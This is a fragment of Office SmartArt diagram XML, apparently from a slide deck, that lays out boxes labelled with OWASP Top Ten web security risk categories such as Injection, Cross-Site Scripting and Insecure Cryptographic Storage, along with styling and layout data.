      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{21C97EC3-34E8-4C93-8686-60A47A9C2802}" type="sibTrans" cxnId="{376E3F9D-D0A5-4750-A982-6A39581A8CFA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4F33ADAD-0E7A-4CC4-926A-E1D695B40CC0}">
      <dgm:prSet/>
      <dgm:spPr>
        <a:gradFill flip="none" rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:srgbClr val="0066CC">
                <a:shade val="30000"/>
                <a:satMod val="115000"/>
              </a:srgbClr>
            </a:gs>
            <a:gs pos="50000">
              <a:srgbClr val="0066CC">
                <a:shade val="67500"/>
                <a:satMod val="115000"/>
              </a:srgbClr>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="0066CC">
                <a:shade val="100000"/>
                <a:satMod val="115000"/>
              </a:srgbClr>
            </a:gs>
          </a:gsLst>
          <a:lin ang="5400000" scaled="1"/>
          <a:tileRect/>
        </a:gradFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" dirty="0"/>
            <a:t>A8: Insecure Cryptographic Storage</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E7A793B8-03F9-44FB-B548-E39857E00497}" type="parTrans" cxnId="{76CF4293-369C-41CD-B754-A785EFCB9622}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{91422C4A-3296-4DFB-AE5C-9EA4E27DD597}" type="sibTrans" cxnId="{76CF4293-369C-41CD-B754-A785EFCB9622}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1425CBBF-4498-4BCE-BC74-DC76A4124027}">
      <dgm:prSet/>
      <dgm:spPr>
        <a:gradFill flip="none" rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:srgbClr val="0066CC">
                <a:shade val="30000"/>
                <a:satMod val="115000"/>
              </a:srgbClr>
            </a:gs>
            <a:gs pos="50000">
              <a:srgbClr val="0066CC">
                <a:shade val="67500"/>
                <a:satMod val="115000"/>
              </a:srgbClr>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="0066CC">
                <a:shade val="100000"/>
                <a:satMod val="115000"/>
              </a:srgbClr>
            </a:gs>
          </a:gsLst>
          <a:lin ang="5400000" scaled="1"/>
          <a:tileRect/>
        </a:gradFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" altLang="ja-JP" b="1" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
            </a:rPr>
            <a:t>A9: </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" u="none" dirty="0"/>
            <a:t>Insufficient Transport Layer Protection</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" b="1" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{19134321-D03B-461B-8751-7D003E0AC7D7}" type="parTrans" cxnId="{5A3A9910-884E-4824-B114-A7BC95B09EB8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{666FBC44-2286-4F44-B1F4-A1DAA3A49E32}" type="sibTrans" cxnId="{5A3A9910-884E-4824-B114-A7BC95B09EB8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E1CE3EE4-2936-4D8B-92A3-E104BE0FAA24}" type="pres">
      <dgm:prSet presAssocID="{267281CF-8B67-4D2B-AFDC-72ADEAA7440C}" presName="diagram" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AD2E9B06-A06B-443C-83A3-58564550A9C4}" type="pres">
      <dgm:prSet presAssocID="{64169CBD-621B-41AC-8098-190EB836285B}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="10">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A30A05D7-A3A0-471E-BE40-D9A5641B2C43}" type="pres">
      <dgm:prSet presAssocID="{55DCDCCE-3CAF-428A-ABFC-A8BC8FEF6AA5}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BA79777C-83D7-4A20-8C72-9B06E33970B3}" type="pres">
      <dgm:prSet presAssocID="{267067DC-F960-471F-8C6E-E0A998CDE8CA}" presName="node" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="10">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8507AF65-B6FE-4008-8A2F-CDD834EC50CF}" type="pres">
      <dgm:prSet presAssocID="{21C97EC3-34E8-4C93-8686-60A47A9C2802}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{049F4145-C84A-42C6-8C4A-A73F5D1F13B1}" type="pres">
      <dgm:prSet presAssocID="{05B6A14E-A58A-427E-80F5-495E20005676}" presName="node" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="10" custLinFactNeighborX="-163" custLinFactNeighborY="208">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{83238806-E393-4882-A18C-F18C628330C0}" type="pres">
      <dgm:prSet presAssocID="{E232C4F9-D265-42B7-A469-2C93E3FE3984}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C3E7A39C-1CAB-4280-9674-550D9EBD3664}" type="pres">
      <dgm:prSet presAssocID="{7FBC627C-7A5D-4F89-A1E1-F66E815CA8A7}" presName="node" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="10" custLinFactNeighborY="-1132">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{931C115E-C0A7-4720-AB3F-606E25B53088}" type="pres">
      <dgm:prSet presAssocID="{678EE478-5D87-49D0-AC29-0A904E85A9CD}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E75F8F30-3FA0-429A-A777-BC11F620C600}" type="pres">
      <dgm:prSet presAssocID="{C1059736-A6E2-4762-8F49-0456CD8B7C69}" presName="node" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="10">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{52B5463B-623E-4AEB-A7DB-47178B6C71AF}" type="pres">
      <dgm:prSet presAssocID="{C998CC39-D1D3-43DE-8252-4B94A9279E42}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{764C6158-AD60-4271-9C65-2ABDF85CAA50}" type="pres">
      <dgm:prSet presAssocID="{8BCDC084-67CA-4889-BB16-FDAA18262BAD}" presName="node" presStyleLbl="node1" presStyleIdx="5" presStyleCnt="10">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{14B07B39-8E48-404A-8551-E175E2765349}" type="pres">
      <dgm:prSet presAssocID="{C306F358-4A0E-4076-9570-D654E65D82B2}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EA75EA57-6CCA-4563-87BD-023630ABCFA8}" type="pres">
      <dgm:prSet presAssocID="{FA4512F7-A63A-4F40-B5B4-6004D8EEA2E4}" presName="node" presStyleLbl="node1" presStyleIdx="6" presStyleCnt="10">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3D5A4703-D8B9-4D1C-8A2E-D5D54AE747D3}" type="pres">
      <dgm:prSet presAssocID="{F7E858A2-0BF8-451A-8FF3-814E21CFC0A2}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{41C906C3-FECE-4AA6-9B2E-E742275892E7}" type="pres">
      <dgm:prSet presAssocID="{4F33ADAD-0E7A-4CC4-926A-E1D695B40CC0}" presName="node" presStyleLbl="node1" presStyleIdx="7" presStyleCnt="10">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8ECC9BA1-2FE2-4A13-AE32-C8596A65EAFD}" type="pres">
      <dgm:prSet presAssocID="{91422C4A-3296-4DFB-AE5C-9EA4E27DD597}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0E5BD108-059F-48AE-801C-18529182DE42}" type="pres">
      <dgm:prSet presAssocID="{1425CBBF-4498-4BCE-BC74-DC76A4124027}" presName="node" presStyleLbl="node1" presStyleIdx="8" presStyleCnt="10">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{11F16691-C99F-4C33-BA9A-69AB3E50019C}" type="pres">
      <dgm:prSet presAssocID="{666FBC44-2286-4F44-B1F4-A1DAA3A49E32}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AB8EC8CA-2DD9-43B0-BAC8-DBF5D6A86196}" type="pres">
      <dgm:prSet presAssocID="{231AA091-BC50-4CB1-B212-84DF97C37E43}" presName="node" presStyleLbl="node1" presStyleIdx="9" presStyleCnt="10">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{E3C97D02-B38A-431B-9AF9-CACB0F6862A1}" type="presOf" srcId="{7FBC627C-7A5D-4F89-A1E1-F66E815CA8A7}" destId="{C3E7A39C-1CAB-4280-9674-550D9EBD3664}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{AE4E6705-38DF-4ECA-80E1-760699C4E255}" srcId="{267281CF-8B67-4D2B-AFDC-72ADEAA7440C}" destId="{05B6A14E-A58A-427E-80F5-495E20005676}" srcOrd="2" destOrd="0" parTransId="{2F9BC56F-924A-4353-9F8F-40E52BE6F39F}" sibTransId="{E232C4F9-D265-42B7-A469-2C93E3FE3984}"/>
    <dgm:cxn modelId="{1986BA05-DD10-47C3-87F8-99915C9082BF}" type="presOf" srcId="{1425CBBF-4498-4BCE-BC74-DC76A4124027}" destId="{0E5BD108-059F-48AE-801C-18529182DE42}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{F9343806-E096-4C13-AD1C-54B8A45EE59B}" type="presOf" srcId="{05B6A14E-A58A-427E-80F5-495E20005676}" destId="{049F4145-C84A-42C6-8C4A-A73F5D1F13B1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{A25FC508-31D3-47AB-B526-F240B6F5C2DF}" srcId="{267281CF-8B67-4D2B-AFDC-72ADEAA7440C}" destId="{FA4512F7-A63A-4F40-B5B4-6004D8EEA2E4}" srcOrd="6" destOrd="0" parTransId="{D53CD27D-BDD3-444C-AE6A-2311E83F246A}" sibTransId="{F7E858A2-0BF8-451A-8FF3-814E21CFC0A2}"/>
    <dgm:cxn modelId="{5A3A9910-884E-4824-B114-A7BC95B09EB8}" srcId="{267281CF-8B67-4D2B-AFDC-72ADEAA7440C}" destId="{1425CBBF-4498-4BCE-BC74-DC76A4124027}" srcOrd="8" destOrd="0" parTransId="{19134321-D03B-461B-8751-7D003E0AC7D7}" sibTransId="{666FBC44-2286-4F44-B1F4-A1DAA3A49E32}"/>
    <dgm:cxn modelId="{63E0B01F-E6B0-4341-846D-AEB7BCF19307}" srcId="{267281CF-8B67-4D2B-AFDC-72ADEAA7440C}" destId="{C1059736-A6E2-4762-8F49-0456CD8B7C69}" srcOrd="4" destOrd="0" parTransId="{DBCB215F-2702-4FBF-9B10-EE479A00694C}" sibTransId="{C998CC39-D1D3-43DE-8252-4B94A9279E42}"/>
    <dgm:cxn modelId="{A7060226-67A3-4AC9-AC3D-6654E4311B5E}" type="presOf" srcId="{FA4512F7-A63A-4F40-B5B4-6004D8EEA2E4}" destId="{EA75EA57-6CCA-4563-87BD-023630ABCFA8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{E8FA1B3E-891C-44F5-8B95-213F7D5CE5C0}" srcId="{267281CF-8B67-4D2B-AFDC-72ADEAA7440C}" destId="{64169CBD-621B-41AC-8098-190EB836285B}" srcOrd="0" destOrd="0" parTransId="{C2478B4C-85CC-4B56-8035-A1D085B2572C}" sibTransId="{55DCDCCE-3CAF-428A-ABFC-A8BC8FEF6AA5}"/>
    <dgm:cxn modelId="{87367C5A-800E-4ABA-8B2B-CF70A5C89137}" srcId="{267281CF-8B67-4D2B-AFDC-72ADEAA7440C}" destId="{8BCDC084-67CA-4889-BB16-FDAA18262BAD}" srcOrd="5" destOrd="0" parTransId="{DFCC82B9-B307-4045-991F-0A63623D1F34}" sibTransId="{C306F358-4A0E-4076-9570-D654E65D82B2}"/>
    <dgm:cxn modelId="{0079258E-2C9E-4F4D-9D0B-6F7F48908B1F}" type="presOf" srcId="{64169CBD-621B-41AC-8098-190EB836285B}" destId="{AD2E9B06-A06B-443C-83A3-58564550A9C4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{76CF4293-369C-41CD-B754-A785EFCB9622}" srcId="{267281CF-8B67-4D2B-AFDC-72ADEAA7440C}" destId="{4F33ADAD-0E7A-4CC4-926A-E1D695B40CC0}" srcOrd="7" destOrd="0" parTransId="{E7A793B8-03F9-44FB-B548-E39857E00497}" sibTransId="{91422C4A-3296-4DFB-AE5C-9EA4E27DD597}"/>
    <dgm:cxn modelId="{82EF4097-8364-4F79-9504-747DD5728C73}" type="presOf" srcId="{C1059736-A6E2-4762-8F49-0456CD8B7C69}" destId="{E75F8F30-3FA0-429A-A777-BC11F620C600}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{376E3F9D-D0A5-4750-A982-6A39581A8CFA}" srcId="{267281CF-8B67-4D2B-AFDC-72ADEAA7440C}" destId="{267067DC-F960-471F-8C6E-E0A998CDE8CA}" srcOrd="1" destOrd="0" parTransId="{D761F71C-31BB-498F-A08E-70F30EB51CB4}" sibTransId="{21C97EC3-34E8-4C93-8686-60A47A9C2802}"/>
    <dgm:cxn modelId="{395778C8-53B7-4ABA-B003-A8A213D8106E}" srcId="{267281CF-8B67-4D2B-AFDC-72ADEAA7440C}" destId="{231AA091-BC50-4CB1-B212-84DF97C37E43}" srcOrd="9" destOrd="0" parTransId="{DFD4E4B3-889C-44E4-98F7-CDE5F5A9E369}" sibTransId="{A9F48C2C-FB58-44F1-8762-0ACF43D4AFFD}"/>
    <dgm:cxn modelId="{2A0CBACC-B147-449D-BB98-25DDC767BE55}" type="presOf" srcId="{267281CF-8B67-4D2B-AFDC-72ADEAA7440C}" destId="{E1CE3EE4-2936-4D8B-92A3-E104BE0FAA24}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{AB8C0BD0-D5FC-4759-9CC4-AE3498EADFC7}" type="presOf" srcId="{8BCDC084-67CA-4889-BB16-FDAA18262BAD}" destId="{764C6158-AD60-4271-9C65-2ABDF85CAA50}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{31DC84D2-4786-4588-BD13-39E23754F0DE}" type="presOf" srcId="{267067DC-F960-471F-8C6E-E0A998CDE8CA}" destId="{BA79777C-83D7-4A20-8C72-9B06E33970B3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{62F5A9D3-EBF9-4BEC-9613-FD255126CCE1}" srcId="{267281CF-8B67-4D2B-AFDC-72ADEAA7440C}" destId="{7FBC627C-7A5D-4F89-A1E1-F66E815CA8A7}" srcOrd="3" destOrd="0" parTransId="{C77C0D7A-4688-41D5-A7B6-ECC1745C80BA}" sibTransId="{678EE478-5D87-49D0-AC29-0A904E85A9CD}"/>
    <dgm:cxn modelId="{48D303DF-5536-4E8B-8A6B-835CFBADB6D0}" type="presOf" srcId="{4F33ADAD-0E7A-4CC4-926A-E1D695B40CC0}" destId="{41C906C3-FECE-4AA6-9B2E-E742275892E7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{E79280F3-2878-428E-B0ED-B6A2A0C30966}" type="presOf" srcId="{231AA091-BC50-4CB1-B212-84DF97C37E43}" destId="{AB8EC8CA-2DD9-43B0-BAC8-DBF5D6A86196}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{EB7176DE-C9A9-46B9-9523-1F8ABB3594C9}" type="presParOf" srcId="{E1CE3EE4-2936-4D8B-92A3-E104BE0FAA24}" destId="{AD2E9B06-A06B-443C-83A3-58564550A9C4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{4311C101-9A23-4E41-9118-81999C0AC722}" type="presParOf" srcId="{E1CE3EE4-2936-4D8B-92A3-E104BE0FAA24}" destId="{A30A05D7-A3A0-471E-BE40-D9A5641B2C43}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{E36C8067-0CC3-4978-8D2C-462EEF0E9FA0}" type="presParOf" srcId="{E1CE3EE4-2936-4D8B-92A3-E104BE0FAA24}" destId="{BA79777C-83D7-4A20-8C72-9B06E33970B3}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{A897726C-6F2B-4D91-96A0-69C384A002C8}" type="presParOf" srcId="{E1CE3EE4-2936-4D8B-92A3-E104BE0FAA24}" destId="{8507AF65-B6FE-4008-8A2F-CDD834EC50CF}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{6A12D3FD-61D0-4363-A4ED-914C6B5EF21B}" type="presParOf" srcId="{E1CE3EE4-2936-4D8B-92A3-E104BE0FAA24}" destId="{049F4145-C84A-42C6-8C4A-A73F5D1F13B1}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{E281CA2A-C266-49C8-86F0-A97772B6D618}" type="presParOf" srcId="{E1CE3EE4-2936-4D8B-92A3-E104BE0FAA24}" destId="{83238806-E393-4882-A18C-F18C628330C0}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{7EE2CAAF-09B2-42B0-AC3A-6AD8DAB9E2E7}" type="presParOf" srcId="{E1CE3EE4-2936-4D8B-92A3-E104BE0FAA24}" destId="{C3E7A39C-1CAB-4280-9674-550D9EBD3664}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{5BFFF0AD-E336-4568-8D58-A45EEE8D7CB9}" type="presParOf" srcId="{E1CE3EE4-2936-4D8B-92A3-E104BE0FAA24}" destId="{931C115E-C0A7-4720-AB3F-606E25B53088}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{034685C6-3BA2-4E80-9882-B65E6EC21718}" type="presParOf" srcId="{E1CE3EE4-2936-4D8B-92A3-E104BE0FAA24}" destId="{E75F8F30-3FA0-429A-A777-BC11F620C600}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{068A503D-151A-4211-BD3F-2CE7A7076525}" type="presParOf" srcId="{E1CE3EE4-2936-4D8B-92A3-E104BE0FAA24}" destId="{52B5463B-623E-4AEB-A7DB-47178B6C71AF}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{C8E2FB7D-9F66-4898-A1B4-071E07B01999}" type="presParOf" srcId="{E1CE3EE4-2936-4D8B-92A3-E104BE0FAA24}" destId="{764C6158-AD60-4271-9C65-2ABDF85CAA50}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{B995D358-6FF8-40E3-A288-E61ECA298CBC}" type="presParOf" srcId="{E1CE3EE4-2936-4D8B-92A3-E104BE0FAA24}" destId="{14B07B39-8E48-404A-8551-E175E2765349}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{1796A70B-9993-4123-B15D-5012872B1F17}" type="presParOf" srcId="{E1CE3EE4-2936-4D8B-92A3-E104BE0FAA24}" destId="{EA75EA57-6CCA-4563-87BD-023630ABCFA8}" srcOrd="12" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{B6AD06FF-2DF0-49D0-B192-FE4D6EDFF711}" type="presParOf" srcId="{E1CE3EE4-2936-4D8B-92A3-E104BE0FAA24}" destId="{3D5A4703-D8B9-4D1C-8A2E-D5D54AE747D3}" srcOrd="13" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{005E69DB-4614-44D9-A812-6B60CEAD88F3}" type="presParOf" srcId="{E1CE3EE4-2936-4D8B-92A3-E104BE0FAA24}" destId="{41C906C3-FECE-4AA6-9B2E-E742275892E7}" srcOrd="14" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{C05B412A-6E4F-4DBF-B708-952FE4AE166F}" type="presParOf" srcId="{E1CE3EE4-2936-4D8B-92A3-E104BE0FAA24}" destId="{8ECC9BA1-2FE2-4A13-AE32-C8596A65EAFD}" srcOrd="15" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{CD636D86-7DFB-41A4-A500-E357CC7A23BC}" type="presParOf" srcId="{E1CE3EE4-2936-4D8B-92A3-E104BE0FAA24}" destId="{0E5BD108-059F-48AE-801C-18529182DE42}" srcOrd="16" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{657B6E0D-0CC6-41D4-941F-75B782A3E297}" type="presParOf" srcId="{E1CE3EE4-2936-4D8B-92A3-E104BE0FAA24}" destId="{11F16691-C99F-4C33-BA9A-69AB3E50019C}" srcOrd="17" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default#1"/>
    <dgm:cxn modelId="{35AAB028-7C70-4724-B6B3-55018299EF97}" type="presParOf" srcId="{E1CE3EE4-2936-4D8B-92A3-E104BE0FAA24}" destId="{AB8EC8CA-2DD9-43B0-BAC8-DBF5D6A86196}" srcOrd="18" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/defaul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2E9B06-A06B-443C-83A3-58564550A9C4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="306793" y="612"/>
          <a:ext cx="1930654" cy="1158392"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent2"/>
        </a:solidFill>
        <a:ln>
          <a:noFill/>
        </a:ln>
        <a:effectLst>
          <a:outerShdw blurRad="50800" dist="12700" dir="5400000" algn="ctr" rotWithShape="0">
            <a:srgbClr val="000000">
              <a:alpha val="50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kumimoji="0" lang="en-US" sz="1900" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln/>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
            </a:rPr>
            <a:t>A1: Injection</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1900" b="1" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="306793" y="612"/>
        <a:ext cx="1930654" cy="1158392"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BA79777C-83D7-4A20-8C72-9B06E33970B3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2430513" y="612"/>
          <a:ext cx="1930654" cy="1158392"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent2"/>
        </a:solidFill>
        <a:ln>
          <a:noFill/>
        </a:ln>
        <a:effectLst>
          <a:outerShdw blurRad="50800" dist="12700" dir="5400000" algn="ctr" rotWithShape="0">
            <a:srgbClr val="000000">
              <a:alpha val="50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kumimoji="0" lang="en-US" sz="1900" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln/>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
            </a:rPr>
            <a:t>A2: Cross-Site Scripting (XSS)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1900" b="1" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2430513" y="612"/>
        <a:ext cx="1930654" cy="1158392"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{049F4145-C84A-42C6-8C4A-A73F5D1F13B1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4551085" y="3022"/>
          <a:ext cx="1930654" cy="1158392"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent2"/>
        </a:solidFill>
        <a:ln>
          <a:noFill/>
        </a:ln>
        <a:effectLst>
          <a:outerShdw blurRad="50800" dist="12700" dir="5400000" algn="ctr" rotWithShape="0">
            <a:srgbClr val="000000">
              <a:alpha val="50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kumimoji="0" lang="en-US" sz="1900" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln/>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
            </a:rPr>
            <a:t>A3: </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="ja-JP" sz="1900" b="1" kern="1200" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
            </a:rPr>
            <a:t>Broken Authentication and Session Management</a:t>
          </a:r>
